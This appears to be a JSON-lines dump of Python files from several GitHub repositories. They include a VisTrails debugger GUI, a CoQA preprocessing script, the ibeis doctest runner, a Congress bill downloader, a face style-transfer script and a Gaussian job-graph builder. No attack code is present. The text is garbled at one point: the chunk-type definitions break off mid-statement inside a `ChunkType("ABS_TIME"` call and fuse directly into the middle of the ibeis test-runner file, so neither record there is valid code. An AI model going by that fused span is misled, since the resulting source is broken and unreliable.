update_vals() -> None\n Update the debugger after an execution with any values that become\n available on its input ports.\n \"\"\"\n self.update(update_vals=True)\n \n def update(self, update_vals=False):\n \"\"\"\n update(update_vals=False) -> None\n Update the debugger. If the update requires querying modules for input\n changes, update_vals should be set to True\n \"\"\"\n self.inspector.clear_modules()\n if self.controller is not None:\n pipeline = self.controller.current_pipeline\n if pipeline is None:\n return\n\n for module in pipeline.module_list:\n if module.is_breakpoint or module.is_watched:\n self.inspector.add_module(module)\n if update_vals:\n (module_objects, _, _) = \\\n self.vistrails_interpreter.find_persistent_entities(\n pipeline)\n for m_id in self.inspector.modules:\n if (m_id in module_objects and \n module_objects[m_id] is not None):\n self.inspector.update_values(m_id, module_objects[m_id])\n elif module_objects[m_id] is None:\n edges = pipeline.graph.edges_to(m_id)\n self.inspector.update_inputs(m_id, module_objects, \n edges,\n pipeline.connections)\n\n def closeEvent(self, e):\n \"\"\"closeEvent(e) -> None\n Event handler called when the dialog is about to close.\"\"\"\n self.emit(QtCore.SIGNAL(\"debuggerHidden()\"))\n \n###############################################################################\n# QObjectInspector\n\nclass QObjectInspector(QtGui.QTreeWidget):\n \"\"\"\n This class provides the ability to track and inspect breakpoints added to a pipeline.\n It is meant to be embedded in the QDebugger object to allow debugging of workflows in\n VisTrails\n \"\"\"\n def __init__(self, parent=None):\n QtGui.QTreeWidget.__init__(self, parent)\n self.setColumnCount(2)\n self.modules = {}\n\n def clear_modules(self):\n \"\"\"\n clear_modules() -> None\n Clear the current list of module breakpoints\n \"\"\"\n self.modules = {}\n self.clear()\n \n def add_module(self, m):\n \"\"\"\n add_module(m : core.vistrail.module.Module) -> None\n Add the give module, m, as a breakpoint.\n \"\"\"\n # !!! This uses the core.vistrail.module.Module item\n item = QDebugModuleItem(self)\n item.setText(0, \"%s (%d)\" % (m.name, m.id))\n item.setText(1, \"Module Type\")\n self.modules[m.id] = item\n# self.add_dict(m, item)\n# self.add_ports(m, item, display_vals=get_vals)\n \n def update_values(self, m_id, persistent_module):\n \"\"\"\n update_values(m_id: long, \n persistent_module : subclass of core.modules.vistrails_module.Module)\n \"\"\"\n module_item = self.modules[m_id]\n module_item.takeChildren()\n self.add_dict(persistent_module, module_item)\n self.add_ports(persistent_module, module_item, True)\n\n def update_inputs(self, m_id, persistent_map, edges, connections):\n input_ports = {}\n for upstream_id, c_id in edges:\n if upstream_id in persistent_map and \\\n persistent_map[upstream_id] is not None:\n persistent_module = persistent_map[upstream_id]\n connection = connections[c_id]\n try:\n output_port = \\\n persistent_module.get_output(connection.source.name)\n input_ports[connection.destination.name] = output_port\n except ModuleError:\n input_ports[connection.destination.name] = None\n if len(input_ports) > 0:\n module_item = self.modules[m_id]\n module_item.takeChildren()\n inputs_item = QDebugModuleItem(module_item)\n inputs_item.setText(0, \"inputPorts\")\n inputs_item.setText(1, \"\") \n for port_name, port_val in input_ports.iteritems():\n self.create_port_item(port_name, port_val, True, \n inputs_item)\n \n def add_dict(self, m, parent_item):\n \"\"\"\n add_dict(m, parent_item) -> None\n Add the dictionary associated with module m to be displayed \n as part of the debug information for that breakpoint.\n \"\"\"\n dict_item = QDebugModuleItem(parent_item)\n dict_item.setText(0, \"__dict__\")\n dict_item.setText(1, \"\")\n for k in m.__dict__.keys():\n d_val = QDebugModuleItem(dict_item)\n d_val.setText(0, str(k))\n d_val.setText(1, str(m.__dict__[k]))\n\n\n def create_port_item(self, port_name, port_value, display_vals=False,\n parent=None):\n p_item = QDebugModuleItem(parent)\n p_item.setText(0, str(port_name))\n if display_vals:\n p_item.setText(1, str(port_value))\n else:\n typestr = str(port_value.__class__)\n typestr = typestr.split('.')\n typestr = typestr[len(typestr)-1]\n typestr = typestr[0:len(typestr)-2]\n p_item.setText(1, typestr) \n \n def add_ports(self, m, parent_item, display_vals=False):\n \"\"\"\n add_ports(m, item, display_vals=False) -> None\n Add port information from module m to the item being displayed in the debugger.\n If display_vals is True, fetch the appropriate values from the module's input ports.\n \"\"\"\n inputs_item = QDebugModuleItem(parent_item)\n inputs_item.setText(0, \"inputPorts\")\n inputs_item.setText(1, \"\")\n for port_name in m.inputPorts:\n try:\n port_val = m.get_input_list(port_name)\n if len(port_val) == 1:\n port_val = port_val[0]\n except ModuleError:\n port_val = None\n self.create_port_item(port_name, port_val, display_vals, \n inputs_item)\n outputs_item = QDebugModuleItem(parent_item)\n outputs_item.setText(0, \"outputPorts\")\n outputs_item.setText(1, \"\")\n for port_name in m.outputPorts:\n try:\n port_val = m.get_output(port_name)\n except ModuleError:\n port_val = None\n self.create_port_item(port_name, port_val, display_vals, \n outputs_item)\n\n########################################################################\n# QDebugModuleItem\n\nclass QDebugModuleItem(QtGui.QTreeWidgetItem):\n \"\"\"\n This class provides a unique container for adding breakpoints in a workflow\n to the debugger.\n \"\"\"\n def __init__(self, parent=None):\n QtGui.QTreeWidgetItem.__init__(self, parent)\n \n","repo_name":"VisTrails/VisTrails","sub_path":"vistrails/gui/debugger.py","file_name":"debugger.py","file_ext":"py","file_size_in_byte":8601,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"6"} +{"seq_id":"43524938621","text":"import json\nimport requests\n\n# reader for CoQA dataset\ndef read_coQA(file_path):\n with open(file_path, 'r') as f:\n data = json.load(f)\n return data\n\n# \"source\": \"mctest\",\n# \"id\": \"3dr23u6we5exclen4th8uq9rb42tel\",\n# \"filename\": \"mc160.test.41\",\ndef preprocess_coQA(data, save_path):\n preproc_data = []\n for item in data[\"data\"]:\n temp = {}\n temp['id'] = item['id']\n temp['source'] = item['source']\n temp['filename'] = item['filename']\n temp['meta'] = item['story']\n temp['dialogue'] = []\n temp['turn_id'] = []\n assert len(item['questions']) == len(item['answers'])\n for q,a in zip(item['questions'], item['answers']):\n assert q['turn_id'] == a['turn_id']\n temp['dialogue'].append([q['input_text'],a['input_text']])\n temp['turn_id'].append(q['turn_id'])\n preproc_data.append(temp)\n\n # save preprocessed data in json\n with open(save_path, 'w') as f:\n json.dump(preproc_data, f, indent=4) \n\ndef download_from_link(url, file_path):\n \n r = requests.get(url)\n with open(file_path, 'wb') as f:\n f.write(r.content)\n \n\nif __name__ == \"__main__\":\n # download CoQA dataset\n download_from_link('https://nlp.stanford.edu/data/coqa/coqa-train-v1.0.json', 'coqa-train-v1.0.json')\n download_from_link('https://nlp.stanford.edu/data/coqa/coqa-dev-v1.0.json', 'coqa-dev-v1.0.json')\n \n # # CoQA dataset\n data_path = 'coqa-dev-v1.0.json'\n save_path = 'valid.json'\n data = read_coQA(data_path)\n preprocess_coQA(data, save_path)\n\n data_path = 'coqa-train-v1.0.json'\n save_path = 'train.json'\n data = read_coQA(data_path)\n preprocess_coQA(data, save_path)","repo_name":"andreamad8/FSB","sub_path":"data/coQA/preprocess.py","file_name":"preprocess.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":119,"dataset":"github-code","pt":"6"} +{"seq_id":"70407539388","text":"if __name__ == \"lib.chunkspb\":\n from lib.chunktypepb import ChunkType\nelse:\n from lib.chunktype import ChunkType\n\n# ChunkType(name, key, layout, *fields)\n\nNULL_CHUNK = ChunkType(\"NULL_CHUNK\", 0, \"\")\n\nID_FDSN = ChunkType(\"ID_FDSN\", 1, \"\", # unparsed\n \"data\")\n\nABS_TIME = ChunkType(\"ABS_TIME\", 2, \">> from ibeis.tests.run_tests import * # NOQA\n\n \"\"\"\n\n # DONT USE THESE FLAGS\n #print('--testall and --testslow give you more tests')\n # starts logging for tests\n import ibeis\n\n ibeis._preload()\n # Build module list and run tests\n import sys\n ensure_testing_data()\n if False:\n ut.change_term_title('RUN IBEIS TESTS')\n exclude_doctests_fnames = set([\n '_autogen_explicit_controller',\n 'template_definitions.py',\n 'autogen_test_script.py',\n ])\n exclude_dirs = [\n '_broken',\n 'old',\n 'tests',\n 'timeits',\n '_scripts',\n '_timeits',\n '_doc',\n 'notebook',\n ]\n if ut.in_pyinstaller_package():\n from os.path import dirname\n dpath_list = [dirname(ibeis.__file__)]\n # Run tests for installer\n doctest_modname_list_ = [\n 'ibeis.ibsfuncs',\n 'ibeis.viz.interact.interact_qres2',\n 'ibeis.viz.interact.interact_matches',\n 'ibeis.viz.interact.interact_annotations2',\n 'ibeis.viz.interact.interact_name',\n 'ibeis.viz.interact.interact_query_decision',\n 'ibeis.viz.interact.interact_chip',\n 'ibeis.viz.interact.interact_qres',\n 'ibeis.algo.Config',\n 'ibeis.algo.hots._pipeline_helpers',\n 'ibeis.algo.hots.name_scoring',\n 'ibeis.algo.hots.devcases',\n 'ibeis.algo.hots.neighbor_index',\n 'ibeis.algo.hots.automated_helpers',\n 'ibeis.algo.hots.hots_query_result',\n 'ibeis.algo.hots.automated_oracle',\n 'ibeis.algo.hots.nn_weights',\n 'ibeis.algo.hots.pipeline',\n 'ibeis.algo.hots.automated_params',\n 'ibeis.algo.hots.vsone_pipeline',\n 'ibeis.algo.hots.automatch_suggestor',\n 'ibeis.algo.hots.score_normalization',\n 'ibeis.algo.hots.query_request',\n 'ibeis.algo.hots.chip_match',\n 'ibeis.algo.hots.multi_index',\n 'ibeis.algo.hots.qt_inc_automatch',\n 'ibeis.algo.hots.query_params',\n 'ibeis.algo.hots.precision_recall',\n 'ibeis.algo.hots.hstypes',\n 'ibeis.algo.hots.match_chips4',\n 'ibeis.algo.hots.distinctiveness_normalizer',\n 'ibeis.algo.hots.automated_matcher',\n 'ibeis.algo.hots.special_query',\n 'ibeis.algo.hots.scoring',\n 'ibeis.algo.preproc.preproc_annot',\n 'ibeis.algo.preproc.preproc_imageset',\n 'ibeis.algo.preproc.preproc_image',\n 'ibeis.algo.preproc.preproc_residual',\n 'ibeis.algo.detect.grabmodels',\n 'ibeis.control.manual_annot_funcs',\n 'ibeis.control.manual_chip_funcs',\n 'ibeis.control.manual_species_funcs',\n 'ibeis.control.manual_ibeiscontrol_funcs',\n 'ibeis.control._autogen_party_funcs',\n 'ibeis.control.manual_garelate_funcs',\n 'ibeis.control.manual_name_funcs',\n 'ibeis.control._sql_helpers',\n 'ibeis.control.manual_wildbook_funcs',\n 'ibeis.control.controller_inject',\n 'ibeis.control.manual_lblimage_funcs',\n 'ibeis.control.IBEISControl',\n 'ibeis.control._autogen_featweight_funcs',\n 'ibeis.control.manual_imageset_funcs',\n 'ibeis.control.manual_feat_funcs',\n 'ibeis.control.manual_gsgrelate_funcs',\n 'ibeis.control._autogen_annotmatch_funcs',\n 'ibeis.control.manual_meta_funcs',\n 'ibeis.control.manual_lblannot_funcs',\n 'ibeis.control.DB_SCHEMA',\n 'ibeis.control.manual_lbltype_funcs',\n 'ibeis.control.SQLDatabaseControl',\n 'ibeis.control.manual_image_funcs',\n 'ibeis.control.manual_annotgroup_funcs',\n 'ibeis.control.DBCACHE_SCHEMA',\n 'ibeis.init.main_helpers',\n 'ibeis.init.sysres',\n 'ibeis.gui.clock_offset_gui',\n 'ibeis.dbio.export_subset',\n 'ibeis.dbio.export_hsdb',\n 'ibeis.dbio.ingest_database',\n ]\n else:\n dpath_list = ['ibeis']\n doctest_modname_list_ = ut.find_doctestable_modnames(dpath_list, exclude_doctests_fnames, exclude_dirs)\n\n exclude_doctest_pattern = ut.get_argval(('--exclude-doctest-patterns', '--x'), type_=list, default=[])\n if exclude_doctest_pattern is not None:\n import re\n is_ok = [all([re.search(pat, name) is None for pat in exclude_doctest_pattern])\n for name in doctest_modname_list_]\n doctest_modname_list = ut.compress(doctest_modname_list_, is_ok)\n else:\n doctest_modname_list = doctest_modname_list_\n\n coverage = ut.get_argflag(('--coverage', '--cov',))\n if coverage:\n import coverage\n cov = coverage.Coverage(source=doctest_modname_list)\n cov.start()\n print('Starting coverage')\n\n exclude_lines = [\n 'pragma: no cover',\n 'def __repr__',\n 'if self.debug:',\n 'if settings.DEBUG',\n 'raise AssertionError',\n 'raise NotImplementedError',\n 'if 0:',\n 'if ut.VERBOSE',\n 'if _debug:',\n 'if __name__ == .__main__.:',\n 'print(.*)',\n ]\n for line in exclude_lines:\n cov.exclude(line)\n\n doctest_modname_list2 = []\n for modname in doctest_modname_list:\n try:\n exec('import ' + modname, globals(), locals())\n except ImportError as ex:\n ut.printex(ex, iswarning=True)\n if not ut.in_pyinstaller_package():\n raise\n else:\n doctest_modname_list2.append(modname)\n\n module_list = [sys.modules[name] for name in doctest_modname_list2]\n\n nPass, nTotal, failed_cmd_list = ut.doctest_module_list(module_list)\n\n if coverage:\n print('Stoping coverage')\n cov.stop()\n print('Saving coverage')\n cov.save()\n print('Generating coverage html report')\n cov.html_report()\n\n if nPass != nTotal:\n return 1\n else:\n return 0\n\nif __name__ == '__main__':\n \"\"\"\n python -m ibeis --run-tests\n \"\"\"\n import multiprocessing\n multiprocessing.freeze_support()\n run_tests()\n","repo_name":"smenon8/ibeis","sub_path":"ibeis/tests/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":7022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"6056983106","text":"#!/usr/bin/env python3\n\nimport sys\nimport re\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn as sns\nimport gzip\n\ndef falens(conn):\n lens = []\n curlen = 0\n for l in conn:\n l=l.decode(\"utf-8\").rstrip('\\n')\n if len(l) == 0:\n pass\n elif l[0] == \">\" and curlen > 0:\n lens.append(curlen)\n curlen = 0\n else:\n curlen += len(l)\n if curlen > 0:\n lens.append(curlen)\n curlen = 0\n return(lens)\n\ndef falens_allcl(conn):\n lens_allcl = {}\n cluster = \"\"\n curlen = 0\n for l in conn:\n l=l.decode(\"utf-8\").rstrip('\\n')\n if len(l) == 0:\n pass\n elif l[0] == \">\":\n if curlen > 0 and len(cluster) > 0:\n if not cluster in lens_allcl:\n lens_allcl[cluster] = []\n lens_allcl[cluster].append(curlen)\n curlen = 0\n cluster = l.rstrip('\\n').split()[1].split(':')[0]\n else:\n curlen += len(l)\n if curlen > 0 and len(cluster) > 0:\n if not cluster in lens_allcl:\n lens_allcl[cluster] = []\n lens_allcl[cluster].append(curlen)\n return(lens_allcl)\n\ndef plothist(origlens, finallens, opath, cl_mincount):\n if len(origlens) > cl_mincount and len(finallens) > 0:\n try:\n print(origlens)\n print(finallens)\n sns.distplot(origlens)\n for i in finallens:\n plt.axvline(i, 0, color=\"red\")\n plt.savefig(opath)\n plt.close()\n except np.linalg.LinAlgError:\n print(\"singular matrix:\", opath)\n pass\n\ndef plothist_allcl(origlens_allcl, finallens_allcl, opath_prefix, cl_mincount):\n for cluster, lens in finallens_allcl.items():\n plothist(origlens_allcl[cluster], lens, opath_prefix + \"_cluster_\" + str(cluster) + \"_test.pdf\", cl_mincount)\n\ndef main():\n paths = [x.rstrip('\\n') for x in sys.stdin]\n \n cl_mincount = int(sys.argv[1])\n clre = re.compile(r\"_clustered\")\n clre2 = re.compile(r\"_clustered.fa.gz\")\n paths_nocl = [clre.sub(\"_chosen\", path) for path in paths]\n opath_prefixes = [clre2.sub(\"\", path) for path in paths]\n \n for path, path_nocl, opath_prefix in zip(paths, paths_nocl, opath_prefixes):\n with gzip.open(path, \"r\") as conn:\n origlens_allcl = falens_allcl(conn)\n with gzip.open(path_nocl, \"r\") as conn:\n finallens_allcl = falens_allcl(conn)\n plothist_allcl(origlens_allcl, finallens_allcl, opath_prefix, cl_mincount)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"jgbaldwinbrown/wavy_choose","sub_path":"testing/plot_tests.py","file_name":"plot_tests.py","file_ext":"py","file_size_in_byte":2637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"3139382094","text":"from app import db, BASE_DIR\nfrom app.models import *\n\nimport os\nimport xml.etree.ElementTree as ET\nfrom bs4 import BeautifulSoup\nimport requests\nimport urllib.parse as urlparse\nimport re\nimport json\nimport codecs\nreader = codecs.getreader('utf-8')\n\ncongress_base_url = 'https://www.govtrack.us/data/congress/'\nactive_base_url = 'http://www.senate.gov/reference/active_bill_type/'\n\n\ndef url_in_db(url):\n if 'bills' in url or 'amendments' in url:\n query = db.session.query(Bill).filter_by(url=url).all()\n elif 'votes' in url:\n query = db.session.query(Bill).filter_by(url=url).all()\n return query != None\n \n\ndef url_to_json(url):\n try:\n datapage = requests.get(url)\n data = json.loads(datapage.text)\n except:\n print('***ERROR***',url)\n revisit = os.path.join(BASE_DIR,'data','revisit.txt')\n fo = open(revisit,'a')\n fo.write('%s\\n'%url)\n fo.close()\n return 0 \n return data\n\n\ndef save_directory(congress_id,subdir):\n save_dir = os.path.join(BASE_DIR,'data',subdir,\n congress_id)\n if not os.path.exists(save_dir):\n os.makedirs(save_dir)\n return save_dir\n\n\ndef add_to_json(json_data,**kwargs):\n data = {'raw':json_data}\n for key,value in kwargs.items():\n data[key] = value\n return data\n \ndef save_json_url(url,**kwargs):\n data = url_to_json(url)\n if not data:\n return None\n\n filename = save_json_filename(url,data)\n print('Downloading',url,'to',filename)\n\n json_to_save = add_to_json(data,**{'url':url,'active':False})\n json.dump(json_to_save,open(filename,'w'))\n return filename\n\ndef save_json_filename(url,data):\n congress_id = re.search('[0-9]{1,3}',url).group()\n doc = url.split('/')[-2]+'-'+congress_id+'-other'\n doc_id = data.get('bill_id',\n data.get('amendment_id',\n data.get('vote_id',\n doc)))\n\n if 'bills' in url:\n save_dir = save_directory(congress_id,'bills')\n elif 'votes' in url:\n save_dir = save_directory(congress_id,'sessions')\n elif 'amendments' in url:\n save_dir = save_directory(congress_id,'amendments')\n else:\n save_dir = save_directory(congress_id,'other')\n filename = os.path.join(save_dir,doc_id+'.json')\n\n return filename\n\ndef save_json(data,filename):\n json.dump(data,open(filename,'w'))\n return filename\n\ndef download_json_from_url(url):\n \"\"\"Recursively download data.json files starting from url\"\"\"\n if url.endswith('data.json'):\n print(url)\n save_json_url(url)\n return None\n elif url.endswith(('.xml','.txt')):\n return None\n else:\n try:\n page = requests.get(url)\n print(url)\n except:\n print('***ERROR***',url)\n revisit = os.path.join(BASE_DIR,'data','logs','revisit.txt')\n fo = open(revisit,'a')\n fo.write('%s\\n'%url)\n fo.close()\n return None\n soup = BeautifulSoup(page.text,'html.parser')\n links = [link for link in soup.find_all('a') \\\n if link.text not in ['../','text-versions/']]\n for link in links:\n visit_url = os.path.join(url,link.get('href'))\n download_json_from_url(visit_url)\n\n\ndef get_bill_type(bill_id):\n return re.findall('[a-z]+',bill_id)[0]\n\ndef get_bill_number(bill_id):\n return re.findall('[0-9]+',bill_id)[0]\n\ndef get_article_type(bill_id):\n if 'amdt' in bill_id:\n article_type='amendments'\n elif 'sa' in bill_id:\n article_type='amendments'\n bill_id = bill_id.replace('sa','samdt')\n else:\n article_type='bills'\n return article_type\n\ndef get_bill_url_from_bill_id(bill_id,congress_id):\n base = 'https://www.govtrack.us/data/congress/'\n article_type = get_article_type(bill_id)\n bill_type = get_bill_type(bill_id)\n if bill_type == 'sa':\n bill_id = bill_id.replace('sa','samdt')\n bill_type = 'samdt'\n base = os.path.join(base,str(congress_id),article_type,\n bill_type,bill_id,'data.json')\n return base\n\n\ndef download_from_congress(congress_id):\n url = os.path.join(congress_base_url,str(congress_id))\n print('Starting download from', url)\n download_json_from_url(url)\n return \n\ndef download_from_active_page(congress_id):\n url = 'http://www.senate.gov/reference/active_bill_type/%d.xml'%congress_id\n page = requests.get(url)\n root = ET.fromstring(page.text)\n assert congress_id == int(root.find('congress').text)\n years = list(map(int,root.find('years').text.split('-')))\n date_updated = root.find('date').text\n\n bills = get_active_senate_bills(root)\n filenames = []\n for name,bill_id in bills:\n url = get_bill_url_from_bill_id(bill_id,congress_id)\n data = url_to_json(url)\n filename = save_json_filename(url,data)\n json_to_save = add_to_json(data,**{'url':url,'active':True})\n save_json(json_to_save,filename)\n filenames.append(filename)\n return filenames\n\n\ndef get_active_senate_bills(xml_root):\n \"\"\"Returns short bill name and bill_id\"\"\"\n bills = []\n items = xml_root.findall('.//item')\n for item in items:\n name = item.find('name').text\n for child in item.getchildren():\n if child.tag in ['house','senate']:\n for article in child.getiterator():\n if article.tag == 'article':\n attrib = article.attrib\n noLink = attrib.get('noLink')=='yes'\n if article.text != None and not noLink:\n bill_id = article.text.lower().replace('.','')\n bills.append((name,bill_id))\n return bills\n","repo_name":"mike-a-yen/SeeYourSenate","sub_path":"app/downloader.py","file_name":"downloader.py","file_ext":"py","file_size_in_byte":5835,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"6"} +{"seq_id":"42602752713","text":"#!/usr/bin/env python\nimport numpy as np\n\n# Params\ndisp_min = -0.25\ndisp_max = 0.25\ndisp_nbins = 500\ndirec = [1, 0, 0]\n\n# Main\ndx = (disp_max-disp_min) /disp_nbins\ndisp = np.array(range(disp_nbins+1)) /(disp_nbins) *(disp_max-disp_min) +disp_min\ndirec /= np.linalg.norm(direc)\nfrom ase.io import read, write\natoms = read('supercell_2x2x2_si-conv.traj')\n\nfrom os import environ as env\nenv['CUDA_VISIBLE_DEVICES'] = ''\nfrom subprocess import call\ncall('rm -rf calc-mlp/; mkdir calc-mlp', shell=True)\nfor i in range(len(disp)):\n folder = 'calc-mlp/{}_{}'.format(i, disp[i])\n call('mkdir {}'.format(folder), shell=True)\n new_atoms = atoms.copy()\n posi = new_atoms.get_positions()\n posi[0] += disp[i] *direc\n new_atoms.set_positions(posi)\n write('{}/POSCAR'.format(folder), new_atoms)\n call('lmp-pos2lmp.awk POSCAR > structure.in', shell=True, cwd=folder)\n call('cp frozen_model.pb input-md.in run.sh {}'.format(folder), shell=True)\n call('sh run.sh &', shell=True, cwd=folder)\n\n \n\n\n\n","repo_name":"hitergelei/tools","sub_path":"pes/calc-pes-mlp.py","file_name":"calc-pes-mlp.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"11573164356","text":"import cv2\nimport numpy as np\nimport matplotlib.pylab as plt\nimport scipy.io as sio\nfrom scipy import misc\n\nimport config\nimport pyramid\nimport iris\nfrom utils import *\nfrom morph import morph\n\ndef style_transfer(style_in, im_in_name, style_ex, im_ex_name):\n im_in = im2double(bgr2rgb(cv2.imread(get_img_path(style_in, im_in_name))))\n im_ex = im2double(bgr2rgb(cv2.imread(get_img_path(style_ex, im_ex_name, True))))\n\n mask_in = im2double(bgr2rgb(cv2.imread(get_mask_path(style_in, im_in_name))))\n\n bgs_ex = im2double(bgr2rgb(cv2.imread(get_bgs_path(style_ex, im_ex_name))))\n\n data = sio.loadmat(config.second_mat_file)\n vx, vy = data['vx'], data['vy']\n vxm, vym = data['vxm'], data['vym']\n bin_alpha_in, bin_alpha_ex = data['bin_alpha_in'], data['bin_alpha_ex']\n\n vxf, vyf = thresh_v(vx + vxm, vy + vym)\n\n if config.debug:\n im_ex_wf, mask = warp_image(im_ex, vxf, vyf)\n plt.figure()\n plt.imshow(0.5 * (im_in + im_ex_wf))\n plt.show()\n\n im_in = mask_in * im_in + (1 - mask_in) * bgs_ex\n\n if config.debug:\n plt.figure()\n plt.imshow(im_in)\n plt.show()\n \n im_in = rgb2lab(im_in)\n im_ex = rgb2lab(im_ex)\n\n level = 6\n height, width, channels = im_in.shape\n im_out = np.zeros(im_in.shape)\n\n if config.recomp:\n for c in range(channels):\n pyr_in = pyramid.laplacian_pyramid(im_in[:, :, c], level, bin_alpha_in)\n pyr_ex = pyramid.laplacian_pyramid(im_ex[:, :, c], level, bin_alpha_ex)\n\n pyr_out = []\n for i in range(level - 1):\n r = 2**(i + 2)\n\n l_in = pyr_in[i]\n l_ex = pyr_ex[i]\n l_ex, _ = warp_image(l_ex, vxf, vyf)\n\n e_in = pyramid.imfilter(l_in ** 2, 6 * r - 1, r)\n e_ex = pyramid.imfilter(l_ex ** 2, 6 * r - 1, r)\n gain = (e_ex / (e_in + config.e_0)) ** 0.5\n\n for x in range(height):\n for y in range(width):\n gain[x, y] = max(min(gain[x, y], config.gain_max), config.gain_min)\n\n l_new = l_in * gain\n pyr_out.append(l_new)\n\n last, _ = warp_image(pyr_ex[level - 1], vxf, vyf)\n pyr_out.append(last)\n im_out[:, :, c] = pyramid.sum_pyramid(pyr_out)\n\n im_out = lab2rgb(im_out)\n im_in = lab2rgb(im_in)\n\n im_out = mask_in * im_out + (1 - mask_in) * bgs_ex\n sio.savemat(config.img_out_mat_file, {'im_out': im_out})\n else:\n im_out = sio.loadmat(config.img_out_mat_file)['im_out']\n\n if config.transfer_eye:\n alpha_l = im2double(bgr2rgb(cv2.imread(get_alpha_path(style_ex, True))))\n alpha_r = im2double(bgr2rgb(cv2.imread(get_alpha_path(style_ex, False))))\n\n fg_l = im2double(bgr2rgb(cv2.imread(get_fl_path(style_ex, True))))\n fg_r = im2double(bgr2rgb(cv2.imread(get_fl_path(style_ex, False))))\n\n model = load_model(style_in, im_in_name, True)\n leye_center = np.round(np.mean(model[36:42], 0))\n reye_center = np.round(np.mean(model[42:48], 0))\n\n half_width = 75\n half_height = 50\n\n leye_raw = im_in[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width]\n reye_raw = im_in[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width]\n leye = im_out[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width]\n reye = im_out[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width]\n \n leye_new = iris.eye_transfer(leye, leye_raw, alpha_l, fg_l)\n reye_new = iris.eye_transfer(reye, reye_raw, alpha_r, fg_r)\n\n im_out[int(leye_center[1]) - half_height - 1: int(leye_center[1]) + half_height,\n int(leye_center[0]) - half_width - 1: int(leye_center[0]) + half_width] = leye_new\n im_out[int(reye_center[1]) - half_height - 1: int(reye_center[1]) + half_height,\n int(reye_center[0]) - half_width: int(reye_center[0]) + half_width] = reye_new\n\n plt.figure()\n plt.imshow(im_out)\n plt.show()\n\n if config.save_output_img:\n misc.imsave(config.img_out_path, matrix2image(im_out))\n\nif __name__ == '__main__':\n style_transfer(config.style_in,\n config.im_in_name,\n config.style_ex,\n config.im_ex_name)","repo_name":"Els-y/style_transfer_headshot","sub_path":"second.py","file_name":"second.py","file_ext":"py","file_size_in_byte":4750,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"6"} +{"seq_id":"42489003371","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jun 17 16:03:56 2020\n\n@author: michal\n\"\"\"\n\nfrom graphManager import GraphManager\nfrom antechamberNode import AntechamberNode\nimport networkx as nx\nfrom os import getcwd\nfrom os.path import join\nimport sys\nfrom gaussianNode import GaussianNode\nfrom parsers import getGaussianInpFromSlurmFile\nfrom fitNode import FitNode\n\ndef generateGraph(slurmFile, template):\n jobGraph = nx.DiGraph()\n currentDir = getcwd()\n gaussianFile = getGaussianInpFromSlurmFile(slurmFile)\n \n newNode = GaussianNode(gaussianFile, currentDir)\n newNode.verification = \"Opt\"\n newNode.slurmFile = slurmFile\n newNode.autorestart = True\n jobGraph.add_node( currentDir , data = newNode )\n \n newDir = join(currentDir, \"gesp\")\n newNode = GaussianNode(\"auto_gesp.inp\", newDir)\n newNode.verification = \"SP\"\n \n newNode.routeSection = \"\"\"%Chk=checkp.chk\n%Mem=100GB\n#P B3LYP/6-31G(d,p)\n# Gfinput Pop=full Density Test iop(6/50=1)\n# Units(Ang,Deg) Pop=MK iop(6/33=2) iop(6/42=6)\n\"\"\"\n newNode.additionalSection = \"keto.gesp\\n\\nketo.gesp\\n\\n\"\n newNode.gesp = \"keto.gesp\"\n newNode.time = \"1:00:00\"\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(newDir, data = newNode)\n jobGraph.add_edge(currentDir, newDir)\n \n \n anteDir = join(newDir, \"antechamber\")\n newNode = AntechamberNode(\"keto.gesp\", anteDir)\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(anteDir, data = newNode)\n jobGraph.add_edge(newDir, anteDir)\n \n if template != None:\n fitDir = join(anteDir, \"fit\")\n newNode = FitNode(\"keto.mol2\", fitDir, template)\n newNode.partition = \"plgrid-short\"\n jobGraph.add_node(fitDir, data = newNode)\n jobGraph.add_edge(anteDir, fitDir)\n\n return jobGraph\n\nif __name__ == \"__main__\":\n if not len(sys.argv) in [ 2, 3 ] :\n print(\"ketoPrepare slurmFile, template[optional]\")\n else:\n sm = GraphManager()\n currentDir = getcwd()\n graph = sm.isGraphHere(currentDir)\n \n slurmFile = sys.argv[1]\n template = None\n if len(sys.argv) == 3:\n template = sys.argv[2]\n if not graph:\n newGraph = generateGraph(slurmFile, template)\n \n result = sm.addGraph(newGraph, currentDir)\n if result:\n sm.buildGraphDirectories(newGraph)\n sm.saveGraphs()\n print(\"Created new graph\")\n else:\n print(\"Cannot create more than one graph in the same directory\")","repo_name":"chemiczny/calculationFlow","sub_path":"ketoPrepare.py","file_name":"ketoPrepare.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"5182536684","text":"# Load Libraries\nfrom pandas import read_csv\nfrom seaborn import pairplot\nfrom matplotlib import pyplot\n\n# Load Dataset\nfile = \"YOUR FILEPATH\"\ncolumns = ['sepal-length', 'sepal-width', 'petal-length', 'petal-width', 'class']\ndataset = read_csv(file,names = columns)\n\n# Print Information about 